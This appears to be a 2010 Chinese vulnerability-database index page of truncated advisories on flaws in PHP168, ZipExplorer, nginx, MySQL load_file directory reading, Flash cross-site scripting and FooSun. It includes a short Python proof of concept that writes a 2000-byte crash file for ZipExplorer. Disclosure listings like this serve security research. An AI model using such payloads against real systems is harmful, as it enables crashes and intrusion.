PHP168 V6.01 权限提升漏洞
- 2010-06-20
- Vulndb
发布时间:2010-06-17 影响版本:PHP168 V6.01 漏洞描述: PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能...
ZipExplorer 7.0 利用工具
- 2010-06-20
- Vulndb
作者:TecR0c #!/usr/bin/python dos = "\x41" * 2000 mefile = open('tecr0c.zar','w'); mefile.write(dos); mefile.close(); 利用方法:启动ZipExplor...
nginx HTTP请求源码泄露和拒绝服务漏洞
- 2010-06-18
- Vulndb
发布时间:2010-06-14 影响版本: nginx 0.7.x/0.8.x 漏洞描述: nginx是多平台的HTTP服务器和邮件代理服务器 nginx服务器无法处理交换数据流(ADS),将其处理...
SQL注射中使用Mysql load_file解析bsd目录的脚本
- 2010-06-18
- Vulndb
作者:xi4oyu 可能不少x客都知道mysql load_file能够读取文件的内容。但是在bsd平台上,load_file也能够以文件的方式读取目录内容的前512个字节。 以前遇到这...
一段扫flash跨站的脚本
- 2010-06-18
- Vulndb
作者:xy7 没啥技术含量,主要是扫ExternalInterface.call #!/usr/bin/php -q <?php /*--------------------------------xy7@80sec.com--------------...
风讯网站管理系统API_Response.asp页面存在越权漏洞
- 2010-06-18
- Vulndb
来源:WEB应用漏洞库 影响版本: FooSun > 5.0 漏洞分析: 在文件\API\API_Response.asp中: If Request.QueryString<>"" Then //第16行 SaveUserCoo...